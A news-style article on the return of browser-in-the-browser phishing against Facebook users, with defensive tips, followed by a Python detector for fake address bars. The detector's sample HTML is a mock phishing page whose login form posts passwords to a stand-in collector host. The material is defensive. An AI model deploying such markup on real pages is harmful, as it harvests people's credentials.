
Facebook may feel like a digital retirement home these days, but it remains a prime target for hackers—and a particularly sneaky phishing technique is making the rounds again. Security researchers are warning about a resurgence of so-called browser-in-the-browser (BITB) attacks, with Facebook users squarely in the crosshairs.

A browser-in-the-browser attack takes a familiar phishing trick and upgrades it with deception layered on top of deception. Instead of simply sending users to a fake login page, attackers create an entire fake browser window inside a webpage. That includes a convincing address bar, security icons, and a URL that looks perfectly legitimate at first glance. The result is a login page that appears to be loaded inside a real browser window—even though everything you’re seeing is fake.

According to a new report from security firm Trellix, these attacks are increasingly being used against Facebook accounts. The bait usually arrives via spam emails or text messages claiming there’s a security issue, suspicious activity, or an account problem that needs immediate attention. Clicking the link opens a custom-crafted page that uses the BITB trick, sometimes complete with a CAPTCHA to lower suspicion, followed by a realistic Facebook login prompt designed to harvest usernames and passwords.

Facebook’s enormous user base makes it an especially attractive target. With billions of active users worldwide, many of whom are not particularly security-conscious, attackers have a large pool of potential victims. The danger doesn’t stop at a stolen Facebook account, either—password reuse means a single successful phishing attempt can open the door to email accounts, financial services, and identity theft.

As Bleeping Computer points out, there are still ways to spot a BITB attack if you know what to look for. One simple test is to try dragging the browser window’s title bar; if it won’t move, that’s a red flag. More broadly, avoiding login links altogether remains one of the safest practices. If an email claims there’s a problem with an account, opening a fresh browser window and logging in directly—rather than clicking the link—can quickly reveal whether the warning is real or just another well-disguised scam.
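The defining mismatch of a BITB page, described above, is that the "address bar" is just painted text inside a page that actually lives on another host, and the login form posts wherever the attacker wants. The following scanner, an added example that is not code from Trellix, Bleeping Computer or this article, flags that mismatch in constructed sample HTML; `IMITATED_HOSTS`, `detect_bitb` and the sample page are assumptions made for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a fake address bar is likely to imitate (assumed list for this demo).
IMITATED_HOSTS = {"facebook.com", "www.facebook.com", "m.facebook.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

class _ChromeScanner(HTMLParser):
    """Collect URLs painted as plain text (not real links) and form targets."""
    def __init__(self):
        super().__init__()
        self.in_anchor, self.painted_urls, self.form_actions = 0, [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self.in_anchor += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and a.get("value"):  # read-only "address bar" inputs
            self.painted_urls += URL_RE.findall(a["value"])
    def handle_endtag(self, tag):
        if tag == "a":
            self.in_anchor -= 1
    def handle_data(self, data):
        if not self.in_anchor:  # URL text inside a real <a> is not fake chrome
            self.painted_urls += URL_RE.findall(data)

def detect_bitb(html, page_host):
    """Flag a page on page_host that paints a login URL for a site it is not."""
    s = _ChromeScanner()
    s.feed(html)
    fake = [u for u in s.painted_urls if (urlparse(u).hostname or "") in IMITATED_HOSTS]
    if not fake or page_host in IMITATED_HOSTS:
        return []
    findings = [f"fake address bar: page on {page_host} paints {u}" for u in fake]
    for action in s.form_actions:
        target = urlparse(action).hostname or page_host  # relative action -> page_host
        findings.append(f"credential form posts to {target}")
    return findings

# Constructed sample: a div styled as browser chrome, then a login form posting elsewhere.
SAMPLE_HTML = """
<div class="titlebar">Log in to Facebook</div>
<div class="addressbar"><img src="lock.svg" alt="secure"> https://www.facebook.com/login.php</div>
<form action="https://collector.example/grab" method="post">
  <input name="email" placeholder="Email"><input name="pass" type="password">
</form>
<a href="https://www.facebook.com/help">Need help?</a>
"""
```

Running `detect_bitb(SAMPLE_HTML, "secure-login.example")` reports the painted Facebook URL and the form posting to `collector.example`; the same markup served from `www.facebook.com` produces no findings.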